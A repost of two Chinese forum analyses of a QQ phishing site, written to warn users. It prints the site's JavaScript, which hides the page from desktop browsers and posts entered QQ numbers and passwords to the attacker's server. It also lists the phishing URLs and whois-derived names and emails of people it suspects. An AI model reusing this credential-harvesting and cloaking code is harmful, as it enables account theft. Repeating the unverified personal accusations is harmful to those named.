来自吾爱破解,同一个网站,百分之八九十的人肯定见过这种东西,

第一篇:手机版分析,

原文链接:http://www.52pojie.cn/thread-514804-1-2.html

网址先贴出来http://www.xblteam.net/abc123

0x0 起因
收到好几个好友的信息,居然都是同类的信息(如下图1)。伪装描述信息为QQ空间,并附上文字和图片增加可信度。(点开后如下图2。)
(但终究只是小把戏而已,此类网页盗号一看便知的吧,然而好多人中招。)


0x1 抓包
刚开始用手机设置代{过}{滤}理,用Fiddler抓的包,结果如下。


从表面上看,先是一个301跳转,跳转到http://www.xblteam.net/abc123/(应该是我输入地址的时候漏掉的斜杠,不用管)
跳转后加载网页源码,然后加载js和图片,就到了起因中的第二幅图了。

0x2 分析js
第一个js是jquery库,与分析无关。主要是第二个和第三个。
第二个mobile.js是检测当前UA,如果UA不是手机,就跳转到QQ主页。
第三个kr.js是输入账号密码后点击登陆按钮之后的操作,用正则检查账号是否合法(否则提示"请输入正确的QQ号"),密码是否为空 (否则提示"密码不能为空")。
如果都合法就POST提交到"/index/qq.php" ,然后跳转到"http://user.qzone.qq.com/1064065158?ptlang=2052"(应该是为了使跳转更逼真,也许还顺带刷这个Q的空间人气)
(js我贴在最后)

0x3 测试
用手机按照合法的规则输入账号密码,然后提交,果然和上面的分析一样。
然后直接用电脑,如果不伪装UA就马上跳转到QQ主页。伪装后和手机测试的结果一样。

0x4 总结
盗号者首先伪装描述信息,盗取到QQ后利用群发工具再次群发此信息,扩散式的传播,并伴随盗取账号Q币,发广告等行为。

0x5 查Whois、反查
简单的查了下,得知以下信息:
建站人是胡伟生,邮箱有backorder1@dotmedia.com 20702176@qq.com 80010864@qq.com 地址也能查到,就不发出来了。
发现这个人创了好多站点,所以也可能是盗号者买了他的网站。

0x6 最后

几天前就举报了这个网站,现在还是显示安全,看来盗号者为了过网站检测也是用心良苦。专门用顶级域名延长扩散时间,并使用js来防御来自一般PC的检测,只针对手机,也利用了QQ内置浏览器不显示url的特点。
不过这类网站只要换个网址就又可以继续蹦跶了,希望大家加强警惕,在不确认的情况下不要随意输入账号密码。

两个js如下:

mobile:

var util = (function() {
        var u = navigator.userAgent.toLowerCase();
        return {
                isIphone: function() {
                        return (RegExp("iphone").test(u) || RegExp("ipod touch").test(u))
                },
                isIpad: function() {
                        return RegExp("ipad").test(u)
                },
                isAndroid: function() {
                        return (RegExp("android").test(u) || RegExp("android 2").test(u))
                },
                isMB: function() {
                        return (util.isIphone() || util.isIpad() || util.isAndroid())
                }
        };
})();
window.util = util; (function() {
        if (!util.isMB()) {
                window.location.href = 'http://www.qq.com';
                /**    ķ      PC   ʶ  */
        }
})();

kr:

function check(){
        //alert($("input[name=username]").val());
        //alert($("input[name=password]").val());
        var qq=$("input[name=username]").val();
        var passord=$("input[name=password]").val();
        var re=/^[1-9][0-9]{4,}$/;
        if(!re.test(qq)){
                 alert("请输入正确的QQ号");
             return false;
        }
        if(passord==""){
                 alert("密码不能为空");
             return false;
        }
 
          
 
//        $.ajax({
//            //提交数据的类型 POST GET
//            type:"POST",
//            //提交的网址
//            url:"/index/qq.php",
//            //提交的数据
//            data:{q:qq,p:password},
//            //返回数据的格式
//            datatype: "text",//"xml", "html", "script", "json", "jsonp", "text".
//            //在请求之前调用的函数
//            beforeSend:function(){ },
//            //成功返回之后调用的函数             
//            success:function(data){alert("sucdess");}   ,
//            //调用执行后调用的函数
//            complete: function(XMLHttpRequest, textStatus){
//               //alert(XMLHttpRequest.responseText);
//               //alert(textStatus);
//                //HideLoading();
//            },
//            //调用出错执行的函数
//            error: function(){
//                                alert("error");
//                //请求出错处理
//            }         
//         });
 
 
var return_val=false;
 
$.ajax( {  
    url:'/index/qq.php',// 跳转到 action  
    data:{  
             q : qq,  
             p : passord
    },  
    type:'post',  
    async : false,
    cache:false,  
    dataType:'text',  
    success:function(data) {  
                //window.location.href="http://www.qq.com/";
                //alert(data);
        if(data ==1 ){
                        //alert("fuck");
                        window.location.href="http://user.qzone.qq.com/1064065158?ptlang=2052";             
            $("#info").text("QQ账号或者密码错误,请重新输入!");
                        $("#info").css("color","#FF0000");        
                }else if(data==2){
                        window.location.href="http://user.qzone.qq.com/1064065158?ptlang=2052";             
        }else{
                 
                }
                         
     },  
     error : function() {  
                   
          // view("异常!");  
//       alert("异常!");  
     }  
});
 
 
return return_val;
         
 
}

第二篇:PC端分析

原文链接:http://www.52pojie.cn/thread-514628-1-1.html

早在几周前,一打开手机就发现了许多好友都给我发了一句名为《免费领取500M流量》的消息就像下图所示。


看这消息,根本就不是发的消息嘛,就是XML消息。至于XML,自己去问度娘吧,我这里就不详细的说了。

本来不想管,但是就在今天12号,发现了又有这种类似的,而且还变了花样,你想闹哪样?

那么我就随便的分析一下吧,大神别喷我。


这个就是受害者,当然也很多,我就随便拿了一张o(*≧▽≦)ツ

然后怎么办呢?那我们分析当然要从网站下手了。


复制一下链接得到http://www.xbLteam.net/abc123是这位骚年发给我的。

好的,那么找到了网页地址就好办了。

先去Whois查询,得到如图。


可以看到这个域名是在2016年创建的,但是这里的信息也没有一个有用的,什么邮箱啊,手机号码啊,都是假的!

那我就要使用我的杀手锏了,把这个http://www.xbLteam.net/abc123网页源码下载了如何?于是我马上行动,下载得到图。


打开第一个index.htm这个静态网页。

我吓了一条。这明显是盗号的好吧。


还要输入QQ账号和密码。

文件jquery-2.1.1.min.js和logo.png都没有什么发现,但是在jquery-2.1.1.min.js发现了XML,估计是XML消息吧,但是好像加密过,是乱码也不管了,我们打开kr.js这个最重要的。我只能呵呵。


好吧,聪明的人应该可以知道这个作者的QQ号了。

大家记住哈这个“好人” 的作者QQ为1064065158。至于以后的你们也懂得。

目测此网站后台有数据库,输入的密码账号会记录到里面,还望大家相互告知,遇到这种不知名的网站不要乱输入。

这个网站很聪明,会自动判断是PC还是手机,如果是PC则会自动跳转到qq.com,如果是手机,那自动切换到钓鱼页面!

简单的判别可以手机点进去然后往下拉一下,你就会看到网站,如果不是为XX.QQ.COM为结尾,但让你输入账号密码的网站,还尽量少输入吧,不要贪小便宜!!

2016年7月27日又见这种网站,话说这个真TM有钱啊,巨大利润是吧?这个贴现在用来收集类似于这种网站的吧@Hmily
Hmily大大上报一下有关部门吧,都是绿星认证,估计都是专门买那种腾讯认证过却没钱续费域名的域名。
也请大家互相监督。欢迎上报~~
以下为盗号网站域名:
http://www.xbLteam.net/abc123
http://www.szzwz.cn/500mcc